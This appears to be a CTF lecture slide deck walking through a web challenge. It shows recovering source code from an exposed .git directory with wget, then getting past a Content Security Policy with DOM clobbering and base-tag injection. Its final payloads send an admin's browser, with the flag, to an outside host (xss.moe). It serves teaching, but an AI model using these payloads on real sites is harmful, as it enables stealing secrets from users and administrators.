Scope ‣ What does Easy mean? Beginner => { here! } => Intermediate ‣ I hope this event is to be the next step for the beginners. ‣ More deeply, more broadly, more detailed than CTF for Beginners. Hash tag => #katagaitaiCTF

First of all ‣ Let s access to the target web site! ‣ https://goo.gl/qNjMfD ‣ Because of some technical reasons, you had better access with Chrome(or Chrome based browser). ‣ In this lecture, I use Google Chrome for example. Hash tag => #katagaitaiCTF

Let s see the features ‣ Create an account and login Hash tag => #katagaitaiCTF

Let s see the features ‣ Users can chat with some cows… Hash tag => #katagaitaiCTF

Let s see the features ‣ Users can chat with some cows… Hash tag => #katagaitaiCTF

Let s see the features ‣ Seems impossible to get the premium account Hash tag => #katagaitaiCTF

Let s see the features ‣ Another feature for the reporting problem Hash tag => #katagaitaiCTF

Let s see the features ‣ Another feature for the reporting problem Hash tag => #katagaitaiCTF

Let s see the features ‣ All features of this site ‣ Cower View - Displays all on-line cows ‣ Chatting page - Chat with respective cows ‣ Reporting Page - The form to report problems ‣ Then, what shall we do? ‣ There should be some vulnerabilities. ‣ This site has a XSS. ‣ Can you ﬁnd it out? Hash tag => #katagaitaiCTF

Reporting Page ‣ When seeing the page to send a report to admin, XSSer must think There may be some XSS. ‣ You may say Why did you know that?. ‣ There is no reason, XSS is just there. Hash tag => #katagaitaiCTF

Where s the ﬂag?

Investigation 1 ‣ You have 20 minutes! ‣ Find where the ﬂag is. ‣ Hint: The source code knows everything. ‣ You know many solutions to get the source code. RCE, Path traversal, and so on. Hash tag => #katagaitaiCTF

Review ‣ What you have to do ﬁrstly is gather information. ‣ Whois information, DNS records, HTTP headers, System error messages, and so on. ‣ Sometimes, hidden pages are listed on /robots.txt. ‣ It isn t good to hide something listing on robots.txt. ‣ robots.txt is open to everyone on the Internet. (Of course it s intended to show that crawlers) Hash tag => #katagaitaiCTF

How to get the sources ‣ Use wget to download the .git directory. wget -r --no-check-certificate -erobots=off https://wildwildweb.fluxfingers.net:1401/.git/ ‣ After download it, use git and restore the source codes on the local. Hash tag => #katagaitaiCTF

How to get the sources ‣ Run `git status` and conﬁrm that the directories properly downloaded. Hash tag => #katagaitaiCTF

How to get the sources ‣ Run `git reset ̶hard` and restore fallen out ﬁles. Hash tag => #katagaitaiCTF

Check the conﬁg ‣ The ﬂag string is deﬁned as a constant. 27 // change this 28 define('FLAG', 'XXX'); 29 define('SALT', 'XXX'); ‣ So we need to ﬁnd where this constant is called in the source codes. ‣ It s simple task, just use grep. ‣ grep -e FLAG `ﬁnd . -name '*.php'` Hash tag => #katagaitaiCTF

Grep result ‣ The ﬂag is used in premium.php. ‣ So get into this ﬁle next. Hash tag => #katagaitaiCTF

premium.php ‣ This API is called on the chat page. ‣ In the later step, getting into the client side codes. Hash tag => #katagaitaiCTF

Time to XSS

Investigation 2 ‣ XSS will be needed to capture the ﬂag. ‣ Basically, you have to ﬁnd the vulnerabilities from scratch in CTF. ‣ You have 25 minutes! ‣ Find useful one. Hash tag => #katagaitaiCTF

Review ‣ Could you ﬁnd good one? ‣ Some tags work on /?p=chat#<s>XSS?</s> ‣ However, could you run alert( XSS ) on this page? ‣ There s something strange with this site, right? Hash tag => #katagaitaiCTF

Refused to execute inline event handler because it violates the following Content Security Policy directive: "script-src 'self'". Either the 'unsafe-inline' keyword, a hash ('sha256-...'), or a nonce ('nonce-...') is required to enable inline execution.

Refused to execute inline event handler because it violates the following What s this? =====> Content Security Policy directive: "script-src 'self'". Either the 'unsafe-inline' keyword, a hash ('sha256-...'), or a nonce ('nonce-...') is required to enable inline execution.

What CSP did? ‣ Our XSS code is… ‣ Our XSS code is injected to HTML context ‣ So we have to use inline scripts to execute arbitral codes on the page ‣ However… ‣ CSP blocks executing inline scripts just like <img src=x onerror=alert(1)> ‣ I had a talk about CSP, also refer that ‣ http://www.slideshare.net/yagihashoo/cspfxos Hash tag => #katagaitaiCTF

So, what s the plan?

What can I do? ‣ CSP evasion is out of the scope today. ‣ It s too diﬃcult to deal with in short term. ‣ The policies on this site has no evident ﬂaw. ‣ HTML tag injection is possible even under the CSP. ‣ Some ordinal HTML tags give us ﬂag today. ‣ So today let s learn not ordinal XSS. Hash tag => #katagaitaiCTF

HTML Tag Injection ‣ Generally, it s used as synonym of XSS. ‣ It s simple, just inject some HTML tags. ‣ Today, introducing two of good HTML tag injection attack methods. ‣ Use them and get the ﬂag. Hash tag => #katagaitaiCTF

What s DOM Clobbering? ‣ You know DOM is really messed ‣ Not only DOM, but the Web is all messed for long time. ‣ There should be solid border between the HTML document and the JavaScript code. ‣ And it have to be forbidden implicit access to the JavaScript world from HTML world. ‣ However, for some reasons, it can happen and lead some attacks to the system. Today let s use it. ‣ DOM Clobbering - The Spanner ‣ http://www.thespanner.co.uk/2013/05/16/dom-clobbering/ Hash tag => #katagaitaiCTF

What s DOM Clobbering? ‣ DOM tree is constructed automatically after DOM content loading. ‣ When DOM tree is constructed, some form item elements are integrated into DOM tree(means generating objects in JavaScript world). ‣ It is based on the name or id property of the elements. ‣ So the elements named or assigned ID exists in JavaScript world from the start. Hash tag => #katagaitaiCTF

What s DOM Clobbering? ‣ Overriding document.* objects, we can cause an error intentionally. ‣ You may think Is that all?. ‣ It s trivial, however has a big eﬀect for this HotCows Dating. Hash tag => #katagaitaiCTF

The feature of base tag ‣ Base tag deﬁnes the base uri for the relative paths in the page. ‣ Eﬀect both tags and codes. ‣ Just like below. <!-- The page is on "http://xss.moe/base.html" --> <base href=“http://sqli.moe/"> <a href="foo.html">foo</a> ⇒links to sqli.moe/foo.html <script>location.href="bar.html"</script> ⇒move to sqli.moe/bar.html ‣ Cannot use javascript: , and so on.(maybe) ‣ So not useful for XSS itself Hash tag => #katagaitaiCTF

What happens? ‣ Information leakage ‣ If the request with url parameter occurs on the page that is injected malicious base tag, those url parameters will be sent to the malicious server. <base href=“http://xss.moe/this_is_injected/”> <a href="foo.php?some_secret_info=XXX">link</a> ‣ In this example, the link refers malicious domain xss.moe. ‣ In the result, some_secret_info parameter leaks out to the another server. ‣ Referers too! ‣ In the some situations, http referer info will also leak Hash tag => #katagaitaiCTF

Exploitation 1 ‣ Use the DOM Clobbering and capture the ﬂag. ‣ You have 30 minutes! Hash tag => #katagaitaiCTF

Chase the ﬂag ‣ Use the developer tools ‣ command + option + I ‣ ctrl + shift + I ‣ All web accesses are listed on Network tab ‣ /?api=premium.php is the one we just saw beforehand Hash tag => #katagaitaiCTF

Chase the ﬂag ‣ Let s ﬁnd the code to issue the request to premium.php ‣ Open the Source tab and browse /js/pages/chat.js ‣ Find a phrase premium.php ‣ It s at line 128 ‣ It s called in page.getPremium method ‣ So the next is this method Hash tag => #katagaitaiCTF

Chase the ﬂag ‣ The result of page.getPremium() is stored in page.ﬁrstMessage function at line 139. premium = page.getPremium(); ‣ And, it s divided and stored to another variables immediately has_premium = premium[‘success’]; premium_id = premium[‘message’]; ‣ Finally ﬂag is in premium_id ‣ What is premium_id used for? Hash tag => #katagaitaiCTF

Chase the ﬂag ‣ Find a phrase premium_id ‣ It s at line 207 message = cow_name + ((has_premium) ? ' (' + premium_id + ')' : ‘'); ‣ This message variable is used for `temp.assign(message, msg');` ‣ What s temp? ‣ And you notice `var` keyword is not use at all in this code! Hash tag => #katagaitaiCTF

Chase the ﬂag ‣ temp is everywhere in this code ‣ This is global variable, so all functions can override this variable ‣ And it remains having previous value before override in each method ‣ Moreover, this object has the method named assign. ‣ If this temp variable is location object…? Hash tag => #katagaitaiCTF

Chase the ﬂag ‣ demo Hash tag => #katagaitaiCTF

Chase the ﬂag ‣ demo Hash tag => #katagaitaiCTF

Chase the ﬂag ‣ demo Hash tag => #katagaitaiCTF

Chase the ﬂag ‣ demo Hash tag => #katagaitaiCTF

Chase the ﬂag ‣ The ﬂag is displayed on the chatting page if the user is premium account. ‣ premium.php returns the ﬂag if the user is premium account. ‣ JavaScript codes on the chatting page displays the value premium.php returns on the page. ‣ So use the XSS on the chatting page, we can acquire the ﬂag. Hash tag => #katagaitaiCTF

Think about scenario ‣ There is XSS on the chatting page. ‣ The parameter means destination is vulnerable. ‣ The site have a reporting page and the admin may see the reports. ‣ And admin may have a conversation with the reporter using the chatting page. ‣ So admin type into the reporter name to the chatting page. ‣ It ﬁres our XSS codes. Hash tag => #katagaitaiCTF

Let s clobber DOM! ‣ Firstly, temp variable points location object ‣ Continuously step into the next function call ‣ It changes from location object into Template object in page.view function at line 165. temp = new Template('message.html'); ‣ The next function call is for page.ﬁrstMessage which has code displays the ﬂag on the page ‣ Of course the function doesn t redeﬁnes temp. Hash tag => #katagaitaiCTF

Let s clobber DOM! ‣ Do you remember what DOM clobbering can do? ‣ Override document.* and cause some error ‣ If the code calls document.* method before temp variable is overridden to Template object…? ‣ If it occurs in page.view function, temp remains being location object in page.ﬁrstMessage function. ‣ And location.assign will be called with the ﬂag. Hash tag => #katagaitaiCTF

Let s clobber DOM! ‣ document.getElementById is called at line 146 before temp variable is overridden. ‣ It s awesome, we can clobber document.getElementById and cause error. ‣ After error occurs, the rest of codes in page.view function is not executed. ‣ Skipping some codes, page.ﬁrstMessage will be called. Hash tag => #katagaitaiCTF

Let s clobber DOM! ‣ Let s prove the concept works well. ‣ Set the break point at line 146. btn_logout = document.getElementById('btn-logout'); ‣ Access to /?p=chat#<form name=getElementById></form> ‣ Step into next function call from the break point. ‣ An error occurs at line 146 ‣ To resume script execution, you are at /<form name=getElementById></form> at the end. Hash tag => #katagaitaiCTF

Finally ‣ It s proved that location.assign is called with location.hash.slice(1). ‣ So using the location.hash like below will redirects browser to xss.moe. ‣ #http://xss.moe/<form name=getElementById></ form> ‣ So using the location.hash like below will redirects admin s browser to xss.moe with the ﬂag. ‣ #http://xss.moe/<form name=getElementById></ form> Hash tag => #katagaitaiCTF

Let s clobber DOM! ‣ demo Hash tag => #katagaitaiCTF

Let s clobber DOM! ‣ demo Hash tag => #katagaitaiCTF

Let s clobber DOM! ‣ demo Hash tag => #katagaitaiCTF

Let s clobber DOM! ‣ demo Hash tag => #katagaitaiCTF

Let s clobber DOM! ‣ demo Hash tag => #katagaitaiCTF

Let s clobber DOM! ‣ demo Hash tag => #katagaitaiCTF

Let s clobber DOM! ‣ demo Hash tag => #katagaitaiCTF

Exploitation 2 ‣ Use the base tag injection and capture the ﬂag. ‣ Show you this without exercise. Hash tag => #katagaitaiCTF

Review ‣ Things to do are same with previous one. ‣ Cause an error and make temp remain being location object. ‣ In this example, putting to ally CSP. Hash tag => #katagaitaiCTF

Review ‣ The page uses relative path to get template ﬁle. ‣ So if base tag is injected, we can override request destination. ‣ Remember the CSP policy ‣ It has a rule `connect-src self ` that restricts XHR requests to other origins. ‣ If the destination of a request for getting template is other origin, CSP violation occurs and it cause an error. Hash tag => #katagaitaiCTF

Review ‣ Whichever URL you use will eﬀect. ‣ Because anything but the same origin cause an CSP violation and an error. ‣ So using the location.hash like below will also redirects admin s browser to xss.moe with the ﬂag. ‣ #http://xss.moe/<base href=http://foo.bar> Hash tag => #katagaitaiCTF